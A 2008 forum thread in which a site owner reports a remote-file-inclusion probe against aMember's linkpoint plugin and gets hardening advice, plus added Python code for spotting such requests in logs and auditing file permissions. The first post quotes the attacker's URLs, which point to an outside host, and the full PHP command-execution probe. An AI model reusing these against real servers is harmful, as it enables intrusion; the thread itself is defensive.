What is this visitor scanning in my aMember directories?

Discussion in 'Troubleshooting' started by sboben, May 18, 2008.

  1. sboben

    sboben New Member

    Joined:
    Oct 5, 2006
    Messages:
    48
    I run a script on my site that tells me which visitor (logged by IP) is viewing which pages. I have a visitor on my site right now coming in under multiple IP addresses, and one of the URLs listed under one of his IPs is:

    /amember/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://rooting.sitesled.com/test.txt?

    Now I'm not sure if this is legit or not, but nobody should be digging around within my aMember plug-in directories, let alone tacking on what look like commands back to a php file. The contents of test.txt were:

    <?php
    // Probe: run "id" (Unix) or "net start" (Windows) through whatever
    // command-execution function is still enabled and report whether the
    // host's PHP safe_mode stopped it. First try as-is, then after trying
    // to reset safe_mode/open_basedir with ini_restore().
    if ((@eregi("uid", ex("id"))) || (@eregi("Windows", ex("net start")))) {
        echo("Safe Mode of this Server is : ");
        echo("SafemodeOFF");
    } else {
        ini_restore("safe_mode");
        ini_restore("open_basedir");
        if ((@eregi("uid", ex("id"))) || (@eregi("Windows", ex("net start")))) {
            echo("Safe Mode of this Server is : ");
            echo("SafemodeOFF");
        } else {
            echo("Safe Mode of this Server is : ");
            echo("SafemodeON");
        }
    }

    // Run a shell command with the first execution primitive that has not
    // been disabled: exec, shell_exec, system, passthru, then popen.
    function ex($cfe) {
        $res = '';
        if (!empty($cfe)) {
            if (function_exists('exec')) {
                @exec($cfe, $res);
                $res = join("\n", $res);
            } elseif (function_exists('shell_exec')) {
                $res = @shell_exec($cfe);
            } elseif (function_exists('system')) {
                @ob_start();
                @system($cfe);
                $res = @ob_get_contents();
                @ob_end_clean();
            } elseif (function_exists('passthru')) {
                @ob_start();
                @passthru($cfe);
                $res = @ob_get_contents();
                @ob_end_clean();
            } elseif (@is_resource($f = @popen($cfe, "r"))) {
                $res = "";
                while (!@feof($f)) {
                    $res .= @fread($f, 1024);
                }
                @pclose($f);
            }
        }
        return $res;
    }
    exit;
    ?>

    If anyone can give me an idea of what's going on here, I'd appreciate it.
  2. tomfra

    tomfra Member

    Joined:
    Dec 21, 2006
    Messages:
    199
    It's very likely an automatic script scanning for vulnerabilities in the linkpoint plugin. If you are not using Linkpoint to process payments, simply delete or rename the linkpoint.inc.php file. Also, you should report this hack attempt to sitesled.com which seems to be a freehosting service. Tell them to terminate the "rooting" account ASAP.

    Tomas
  3. robds

    robds New Member

    Joined:
    Dec 23, 2007
    Messages:
    2
    You are seeing some Brazilian script kiddies attempting to hack your website using a known exploit called a "Remote File Inclusion". They're trying to take over your website.

    There is a good article HERE on some things to do to prevent these attacks.
  4. skippybosco

    skippybosco CGI-Central Partner Staff Member

    Joined:
    Aug 22, 2006
    Messages:
    2,526
    TomFra brings up a great point (one I'm going to double check on my sites).

    Be sure to remove ALL plugins (protection and payment) that you are not using from your server to minimize risk.

    Also be sure to double check your CHMOD on the various directories to ensure that they are not vulnerable to local hacking as well.

    A good idea to double check your configurations every now and then.
  5. sboben

    sboben New Member

    Joined:
    Oct 5, 2006
    Messages:
    48
    Wow thanks for the heads-up guys. I'll report that and blow away the extra plug-ins. Learn something every day :-/
  6. sboben

    sboben New Member

    Joined:
    Oct 5, 2006
    Messages:
    48
    Hum... this script or dweeb is also trying to hit this, which is the file that WordPress creates.

    /index.php?_SERVER%5bDOCUMENT_ROOT%5d=http://rooting.sitesled.com/test.txt%3f

    On a side note, the only reason I noticed this was because I have a WordPress plug-in running called Useronline which logs and displays this information. I installed it on a whim to try it out. I never would have known about this otherwise :-O What do you guys use to monitor stuff like this? Anything?

    Wow, even more coincidental, that page where the info is listed was cached so at the moment I hit that page to cache it, that's when they were up to no good. Had the cache not been on, I would have missed it as well. Coincidence? I think the hacker gods are on my side on this one ;-)
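The two probe URLs quoted in this thread (the linkpoint one in the first post and the WordPress index.php one just above) are what a remote-file-inclusion scanner looks like in a web server access log, and the question of how to notice such traffic comes up in the post above. The following is an added example, not code from the forum, from aMember or from WordPress, that flags such requests in Apache combined-format log lines. The sample log is constructed: the two request targets are the ones quoted in the thread, while the IP addresses, timestamps, status codes and user-agent string are made up. It scores a parameter on more than "the value is a URL", because search boxes and referer-style parameters legitimately carry URLs too.

```python
"""Flag remote-file-inclusion (RFI) probes in Apache access-log lines.

Added example for the thread above; it is not code from the forum, from
aMember or from WordPress. The log lines are constructed for the example:
the two request targets are the ones quoted in the thread, while the IPs,
timestamps, status codes and user-agent are made up.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: ip ident user [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
REMOTE_RE = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)

# Constructed sample log (not real traffic); the two probe targets are from the thread.
SAMPLE_LOG = """\
203.0.113.5 - - [18/May/2008:10:12:01 -0500] "GET /amember/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://rooting.sitesled.com/test.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.9 - - [18/May/2008:10:12:03 -0500] "GET /index.php?_SERVER%5bDOCUMENT_ROOT%5d=http://rooting.sitesled.com/test.txt%3f HTTP/1.1" 200 221 "-" "libwww-perl/5.805"
198.51.100.7 - - [18/May/2008:10:15:44 -0500] "GET /amember/member.php?page=2 HTTP/1.1" 200 8190 "-" "Mozilla/5.0"
198.51.100.7 - - [18/May/2008:10:16:02 -0500] "GET /blog/?s=http%3A%2F%2Fexample.com%2Fpage HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
"""


def score_param(name, value):
    """Score one query parameter; 0 means nothing RFI-like about it."""
    value = unquote(value)  # parse_qsl decoded once; this catches double encoding
    reasons = []
    if REMOTE_RE.match(value) or value.lower().startswith(('php://', 'data:')):
        reasons.append('remote-url-value')
    if not reasons:
        return 0, reasons
    # A trailing "?" (or a NUL byte on old PHP) turns whatever the vulnerable
    # include() appends to the path into a query string of the attacker's URL,
    # so the file actually fetched is exactly test.txt.
    if value.endswith('?') or '\x00' in value:
        reasons.append('path-truncation-suffix')
    # config[root_dir]=... only works where register_globals fills arrays from
    # the query string; _SERVER[...]=... tries to overwrite a superglobal.
    if '[' in name:
        reasons.append('array-style-param')
    if name.upper().startswith(('_SERVER[', '_ENV[', 'GLOBALS[')):
        reasons.append('superglobal-overwrite')
    return len(reasons), reasons


def scan_log(lines, threshold=2):
    """Return findings for requests scoring at least `threshold`."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('target'))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            score, reasons = score_param(name, value)
            if score >= threshold:
                findings.append({
                    'ip': m.group('ip'), 'time': m.group('time'),
                    'path': parts.path, 'param': name,
                    'value': unquote(value), 'score': score, 'reasons': reasons,
                })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f['ip']} {f['path']} {f['param']} -> {f['value']} "
              f"(score {f['score']}: {', '.join(f['reasons'])})")
```

Run it against a real log with `scan_log(open('access_log'))`. With the default threshold the two probes score 3 and 4, the `?s=http://...` search request scores 1 and is left alone; raise or lower `threshold` to taste. The trailing `?` on the injected URL is worth recognising on its own: it is the tell that the sender knows the target code appends a filename to the parameter.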
  7. sboben

    sboben New Member

    Joined:
    Oct 5, 2006
    Messages:
    48
    What should they be? I get the whole read, write, execute thing but I always get confused about which needs to be which. For example, it looks like my payment directory and the one paypal_r directory in it are at 755. However, the actual paypal_r.inc.php file is at 644. So I get that the file is NOT executable by the world, which makes sense, but the folder for it is, and that's what always confuses me.
  8. sboben

    sboben New Member

    Joined:
    Oct 5, 2006
    Messages:
    48
    Rob thanks for the link. That was very helpful. I tested my site for the page vulnerability and it passed (whew!) But I see what they're trying to do now... going through each payment plug-in to see if any of them has the vulnerability.
  9. tomfra

    tomfra Member

    Joined:
    Dec 21, 2006
    Messages:
    199
    That seems OK. The dirs should usually be set to 755 which means "executable & readable by everyone", but not writeable. Usually, if you haven't done any special CHMODding to CHMODs 666 or 777 (writable by everyone - meaning every user on the same physical server or virtual environment).

    Some files can be CHMODded to CHMODs such as 666 (writable by everyone) or 777 (writable and executable by everyone) and it would still be safe. It depends on the file type and other security precautions.

    Now I don't want to sound like a mentor or anything, but the number 1 safety precaution everyone should do, in my opinion, would be to move from a shared hosting account (including those so called "reseller hosting" accounts) to a Virtual Private Server (or even a full dedicated server).

    You can get a decent VPS at a very reasonable price these days, usually not much higher than some shared hosting accounts, and if you get a managed one with decent control panel software (it does not have to be cPanel), it has a lot of advantages, better security included, because the VPS environment is separated from the other VPSes on the physical server, so it is not shared with hundreds or thousands of other customers (some of whom could even be black-hat hackers).

    There are many safety precautions one could do to make life of the hacker kiddies harder but that would be a long story.

    Tomas
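The exchange above about 755 on directories, 644 on files and "writable by everyone" modes is easy to get wrong by eye on a big plugin tree. The following is an added example, not code from the forum or from aMember, that walks a directory tree and reports the modes a shared-hosting user should worry about. The directory layout and modes are constructed in a temporary directory to mirror the paths mentioned in the thread (plugins/payment/paypal_r and the linkpoint plugin); the sloppy modes on the linkpoint entries and the sticky world-writable data directory are deliberate so that the checker has something to find.

```python
"""Audit file modes under an aMember-style tree for the problems discussed above.

Added example for the thread; not code from the forum or from aMember. The
directory layout and modes are constructed in a temporary directory to mirror
the paths mentioned in the thread; the bad modes on the linkpoint entries are
deliberate.
"""
import os
import shutil
import stat
import tempfile


def classify(path, mode):
    """Return the list of issues for one inode, given its st_mode.

    On a directory the execute bit means "may traverse", so 755 is the normal
    mode; "rx" for everyone on a directory does not let anyone run anything.
    """
    issues = []
    is_dir = stat.S_ISDIR(mode)
    perm = stat.S_IMODE(mode)
    if perm & stat.S_IWOTH:
        if is_dir and perm & stat.S_ISVTX:
            issues.append('world-writable-dir-sticky')  # /tmp-style; tolerable for uploads
        else:
            issues.append('world-writable')  # any local user can plant or edit code
    if perm & stat.S_IWGRP:
        issues.append('group-writable')  # on shared hosts the group is often shared too
    if not is_dir and perm & stat.S_IXOTH and path.endswith('.php'):
        issues.append('exec-bit-on-php')  # mod_php never needs +x; only CGI setups do
    return issues


def audit(root):
    """Walk `root` and return sorted (relpath, mode, issues) for flagged entries."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            if stat.S_ISLNK(st.st_mode):
                continue  # the target is judged when the walk reaches it
            issues = classify(p, st.st_mode)
            if issues:
                findings.append((os.path.relpath(p, root),
                                 oct(stat.S_IMODE(st.st_mode)), issues))
    return sorted(findings)


def build_demo_tree():
    """Create a constructed aMember-like tree; returns its root (caller removes it)."""
    root = tempfile.mkdtemp(prefix='amember-perms-')
    layout = {  # relative path -> mode; parents listed before children
        'config.inc.php': 0o640,
        'plugins/payment': 0o755,
        'plugins/payment/paypal_r': 0o755,
        'plugins/payment/paypal_r/paypal_r.inc.php': 0o644,
        'plugins/payment/linkpoint': 0o777,            # sloppy "make it work" chmod
        'plugins/payment/linkpoint/linkpoint.inc.php': 0o666,
        'data': 0o1777,                                # world-writable but sticky
    }
    for rel, mode in layout.items():
        p = os.path.join(root, rel)
        if rel.endswith('.php'):
            os.makedirs(os.path.dirname(p), exist_ok=True)
            open(p, 'w').close()
        else:
            os.makedirs(p, exist_ok=True)
        os.chmod(p, mode)
    return root


if __name__ == '__main__':
    root = build_demo_tree()
    try:
        for rel, mode, issues in audit(root):
            print(f'{mode} {rel}: {", ".join(issues)}')
    finally:
        shutil.rmtree(root)
```

Point `audit()` at the real aMember directory to use it for real. On the demo tree it reports the 777 linkpoint directory, the 666 linkpoint.inc.php and the sticky 1777 data directory, and is silent about the 755 directories and the 644 plugin file, which is the answer to the question above: the execute bit on a directory is what lets the web server enter it, and that is not the same thing as a file being executable.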
  10. skippybosco

    skippybosco CGI-Central Partner Staff Member

    Joined:
    Aug 22, 2006
    Messages:
    2,526
    A couple of easy strokes are also to not name your directory amember and to remove the Powered by Amember footer.

    In some instances I've also adjusted form field names to prevent targeted scripts from detecting without a little extra effort.
  11. sboben

    sboben New Member

    Joined:
    Oct 5, 2006
    Messages:
    48
    Excellent. Thanks a ton for all this advice guys. I noticed the minute I deleted all the extra payment plug-ins, whoever it was went away. They were obviously targeting aMember :-/ So, yeah, I'll be renaming my directory tonight - another late night project.

    In case you're curious what the free hosting company said about this, here's the response.

    I appreciated that response.

    Tomas do you have any suggestions for hosts with really good VPS services? Seems like finding a host you really like is hard to do.
  12. tomfra

    tomfra Member

    Joined:
    Dec 21, 2006
    Messages:
    199
    As for the VPS suggestions - when I search for some dedicated server or VPS deals, I check the WebHostingTalk.com forums. The VPS offer forum is at http://www.webhostingtalk.com/forumdisplay.php?f=104 .

    The last VPS I had was from http://www.a2b2.com - it's a UK based company with servers mostly in the UK and US so you can pick the preferred location. I can now see on their web that their prices have gone up but I know the owner makes some special deals in the WHT forums from time to time.

    They were good enough for me, but as always, your experience may differ. I am no longer hosting with them because I got a full dedicated server from another company and split it into VPSes myself.

    Some personal VPS hosting suggestions:

    Choose OpenVZ/Virtuozzo virtualization over Xen if you have no specific needs for Xen or get a really good deal on it (both have advantages and disadvantages), and some standard Linux distribution such as the 32-bit version of CentOS 5 or another Red Hat derivative.

    If you really need cPanel, be prepared to pay $8-$15 a month extra for it and make sure the VPS has at least 512M guaranteed RAM.

    If you are used to another control panel (e.g. Plesk, DirectAdmin), choose that if you get a chance. Personally, I've never liked Ensim. LXAdmin should be a good choice.

    You may also see "Hosting In a Box" being offered - it's basically the same control panel as LXAdmin but with some core differences in installed VPS software (not using Apache for example), that should be OK as well. HiB is best suited for low specs VPSes.

    Don't be surprised if you get a 100-400GB bandwidth allowance per month when your old shared hosting offered something like 2000GB. They were lying! The whole shared hosting business is full of ****. The overselling in the shared hosting industry has gotten out of control.

    If you don't know how much traffic your site needs, take a look at some current and past month stats in Awstats or similar traffic logging software. I bet even 100GB will be more than enough unless you are in the HD video or some heavy multimedia streaming business.

    Now if all of this sounds weird to you, just get a fully managed VPS account and the hosting company should take care of most of it. Managing VPS is not that hard anyway, once everything is setup and if you are using cPanel or something similar, most of the updates are taken care of automatically.

    And don't forget to ask the webhosting company to install CSF firewall for you (or an alternative of course, but I like CSF) and harden the VPS in general - for example using certificate authentication instead of plain text passwords for root SSH etc.

    Again, those are just some personal suggestions, opinions always differ ;)

    Tomas
  13. sboben

    sboben New Member

    Joined:
    Oct 5, 2006
    Messages:
    48
    Hey thanks for taking the time to provide all that detail. That was much appreciated. I'll check out the forums you mention there, do some research and get myself set up. I did upgrade my current site to PHP 5.2.3 to take advantage of the better security for now but I think a VPS solution is necessary if I'm attracting the attention of hackers :-/ Again, thanks for all the feedback guys. Excellent as usual.
